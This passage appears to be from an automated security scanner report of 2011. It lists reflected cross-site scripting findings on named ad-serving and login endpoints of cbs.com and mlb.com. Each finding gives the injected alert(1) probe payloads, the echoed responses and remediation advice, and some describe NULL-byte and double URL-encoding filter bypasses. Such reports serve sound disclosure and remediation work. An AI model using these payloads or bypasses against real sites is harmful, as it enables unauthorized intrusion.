/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US18e97<a>24acc9741b7&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='2000' NCAT='1:' CID='' TO BEACON TEXT) *//* MAC [r20110907-1630-TRUNKPOSTMERGE: ...[SNIP]...
The value of the DVAR_INSTLANG request parameter is copied into a JavaScript inline comment. The payload 23b18*/alert(1)//1007f56aa9 was submitted in the DVAR_INSTLANG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:02:31 GMT
Server: Apache/2.2
Content-Length: 1131
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:02:31 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US23b18*/alert(1)//1007f56aa9&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the DVAR_SESSION request parameter is copied into the HTML document as plain text between tags. The payload 390bc<a>2cca7161cf2 was submitted in the DVAR_SESSION parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:01:55 GMT
Server: Apache/2.2
Content-Length: 489
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:01:55 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c390bc<a>2cca7161cf2&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='2000' NCAT='1:' CI ...[SNIP]...
The value of the DVAR_SESSION request parameter is copied into a JavaScript inline comment. The payload 30f18*/alert(1)//36fc8e73e80 was submitted in the DVAR_SESSION parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:01:21 GMT
Server: Apache/2.2
Content-Length: 1133
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:01:21 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c30f18*/alert(1)//36fc8e73e80&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the GLOBAL&CLIENT:ID request parameter is copied into the HTML document as plain text between tags. The payload 471e1<a>88535f3e092 was submitted in the GLOBAL&CLIENT:ID parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 22:59:45 GMT
Server: Apache/2.2
Content-Length: 489
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 22:59:45 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS471e1<a>88535f3e092&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: ...[SNIP]...
The value of the GLOBAL&CLIENT:ID request parameter is copied into a JavaScript inline comment. The payload bbb4e*/alert(1)//4de806e075b was submitted in the GLOBAL&CLIENT:ID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 22:59:44 GMT
Server: Apache/2.2
Content-Length: 1092
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 22:59:44 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJSbbb4e*/alert(1)//4de806e075b&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.wri ...[SNIP]...
The value of the META&ADSEPARATOR request parameter is copied into the HTML document as plain text between tags. The payload %0029242<script>alert(1)</script>c7413a93569 was submitted in the META&ADSEPARATOR parameter. This input was echoed as 29242<script>alert(1)</script>c7413a93569 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:00:13 GMT
Server: Apache/2.2
Content-Length: 1929
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:00:13 GMT

/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbs-pushdown",segmentId:"1815",rotatorId:"17584",creativeSizeId:"4",isBlank:"1",seg_pageState:"",adHTML:"<!-- default ad --><img src=\"http://adlo ...[SNIP]... "0\" WIDTH=\"0\" alt=\"\" style=\"position:absolute; top:0px; left:0px\" />"})/* MAC [r20110907-1630-TRUNKPOSTMERGE:1.13.14] phx1-ad-xw2.cnet.com::1395308864 2011.10.02.23.00.13 *//* MAC T 0.1.3.4 */;.29242<script>alert(1)</script>c7413a93569/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"ads_magnet",segmentId:"1815",rotatorId:"20384",creativeSizeId:"4",isBlank:"1",seg_pageState:"",adHTML:"<!-- default ad --> ...[SNIP]...
The value of the NCAT request parameter is copied into the HTML document as plain text between tags. The payload 5a2fc<a>2abc7cc0824 was submitted in the NCAT parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:02:43 GMT
Server: Apache/2.2
Content-Length: 507
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:02:43 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A5a2fc<a>2abc7cc0824&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='2000' NCAT='1:5a2fca2abc7cc0824:' CID='' ...[SNIP]...
The value of the NCAT request parameter is copied into a JavaScript inline comment. The payload 75dfc*/alert(1)//0024477fb7b was submitted in the NCAT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:01:53 GMT
Server: Apache/2.2
Content-Length: 1139
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:01:53 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A75dfc*/alert(1)//0024477fb7b&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the NODE request parameter is copied into the HTML document as plain text between tags. The payload 7f24f<a>386fcc1b106 was submitted in the NODE parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:03:08 GMT
Server: Apache/2.2
Content-Length: 489
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:03:08 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=17f24f<a>386fcc1b106&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='2000' NCAT='1:' CID='' TO BEACON TEXT) *//* MAC ...[SNIP]...
The value of the NODE request parameter is copied into a JavaScript inline comment. The payload a87b4*/alert(1)//bad25590d00 was submitted in the NODE parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:02:09 GMT
Server: Apache/2.2
Content-Length: 1117
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:02:09 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1a87b4*/alert(1)//bad25590d00&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the PAGESTATE request parameter is copied into a JavaScript inline comment. The payload 7f52a*/alert(1)//77f952ac5d1 was submitted in the PAGESTATE parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:00:17 GMT
Server: Apache/2.2
Content-Length: 1144
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:00:17 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=7f52a*/alert(1)//77f952ac5d1&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad ...[SNIP]...
The value of the PAGESTATE request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85129'%3balert(1)//d06e92eeed was submitted in the PAGESTATE parameter. This input was echoed as 85129';alert(1)//d06e92eeed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:00:15 GMT
Server: Apache/2.2
Content-Length: 1145
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:00:15 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=85129'%3balert(1)//d06e92eeed&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR ...[SNIP]... sion%253dc&ucat_rsi=%2526&pg=&t=2011.10.02.23.00.15/http://i.i.com.com/cnwk.1d/Ads/common/dotclear.gif" style="position:absolute; top:0px; left:0px" width="0" />'); ;window.CBSI_PAGESTATE='85129';alert(1)//d06e92eeed';/* MAC [r20110907-1630-TRUNKPOSTMERGE:1.13.14] phx1-ad-xw7.cnet.com::1776052544 2011.10.02.23.00.15 *//* MAC T 0.1.3.4 */
The value of the POS request parameter is copied into the HTML document as plain text between tags. The payload 440d4<a>a86f0111d87 was submitted in the POS parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:03:07 GMT
Server: Apache/2.2
Content-Length: 573
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:03:07 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100440d4<a>a86f0111d87&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='119' CNET-PTYPE='10' POS='100440d4aa86f0111d87' NCAT='1:' CNET-PARTNER-ID='1' DVAR_PSID='' ) TO ...[SNIP]...
The value of the PTYPE request parameter is copied into the HTML document as plain text between tags. The payload 7134c<a>f75ef922c36 was submitted in the PTYPE parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:01:07 GMT
Server: Apache/2.2
Content-Length: 506
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:01:07 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=20007134c<a>f75ef922c36&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' P ...[SNIP]...
The value of the PTYPE request parameter is copied into a JavaScript inline comment. The payload 12c80*/alert(1)//b5149415f30 was submitted in the PTYPE parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:00:57 GMT
Server: Apache/2.2
Content-Length: 1117
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:00:57 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=200012c80*/alert(1)//b5149415f30&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the SITE request parameter is copied into the HTML document as plain text between tags. The payload fa7c5<a>619528a5f81 was submitted in the SITE parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:00:22 GMT
Server: Apache/2.2
Content-Length: 533
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:00:22 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164fa7c5<a>619528a5f81&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BRAND=&q ...[SNIP]...
The value of the cookiesOn request parameter is copied into the HTML document as plain text between tags. The payload 8b61d<a>d3e1750ed63 was submitted in the cookiesOn parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:03:32 GMT
Server: Apache/2.2
Content-Length: 489
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:03:32 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=18b61d<a>d3e1750ed63&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='2000' NCAT='1:' CID='' TO BEACON TEXT) *//* MAC [r20110907- ...[SNIP]...
The value of the cookiesOn request parameter is copied into a JavaScript inline comment. The payload 600d8*/alert(1)//748e5133e05 was submitted in the cookiesOn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:02:15 GMT
Server: Apache/2.2
Content-Length: 1091
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:02:15 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1600d8*/alert(1)//748e5133e05&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
2.106. http://mads.cbs.com/mac-ad [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Firm
Host:
http://mads.cbs.com
Path:
/mac-ad
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5daa3<a>6676c279d3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:05:49 GMT
Server: Apache/2.2
Content-Length: 493
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:05:49 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1&5daa3<a>6676c279d3d=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='2000' NCAT='1:' CID='' TO BEACON TEXT) *//* MAC [r20110907-1630-TRUNKPOSTMERGE:1.13.14] phx1-ad-xw11.cnet.com::1772648 ...[SNIP]...
2.107. http://mads.cbs.com/mac-ad [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://mads.cbs.com
Path:
/mac-ad
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript inline comment. The payload c2d42*/alert(1)//dca1b90ae75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:03:51 GMT
Server: Apache/2.2
Content-Length: 1094
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:03:51 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1&c2d42*/alert(1)//dca1b90ae75=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the x-cb request parameter is copied into the HTML document as plain text between tags. The payload bef97<a>6d51ff261c3 was submitted in the x-cb parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:04:21 GMT
Server: Apache/2.2
Content-Length: 489
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:04:21 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046bef97<a>6d51ff261c3&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='2000' NCAT='1:' CID='' TO BEACON TEXT) *//* MAC [r20110907-1630-TRUNKPOSTMERGE:1.13.14] phx1- ...[SNIP]...
The value of the x-cb request parameter is copied into a JavaScript inline comment. The payload 8242a*/alert(1)//a2b812f71ef was submitted in the x-cb parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 23:02:37 GMT Server: Apache/2.2 Content-Length: 1091 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 02 Oct 2011 23:02:37 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=783252448242a*/alert(1)//a2b812f71ef&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the successRedirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52427%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb13060bc01f was submitted in the successRedirect parameter. This input was echoed as 52427"><script>alert(1)</script>b13060bc01f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the successRedirect request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK Server: Oracle-iPlanet-Web-Server/7.0 Content-Type: text/html;charset=ISO-8859-1 Content-Length: 6219 Cache-Control: max-age=7151 Expires: Mon, 03 Oct 2011 01:39:10 GMT Date: Sun, 02 Oct 2011 23:39:59 GMT Connection: close Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>Login</title> <meta http-equi ...[SNIP]... <input type="hidden" name="successRedirect" value="http://mlb.mlb.com/shared/account/v2/login_success.jsp?callback=l131759879149452427"><script>alert(1)</script>b13060bc01f" /> ...[SNIP]...
2.111. http://mlb.mlb.com/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mlb.mlb.com
Path: /index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12fe8"><script>alert(1)</script>fe0afe25a1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
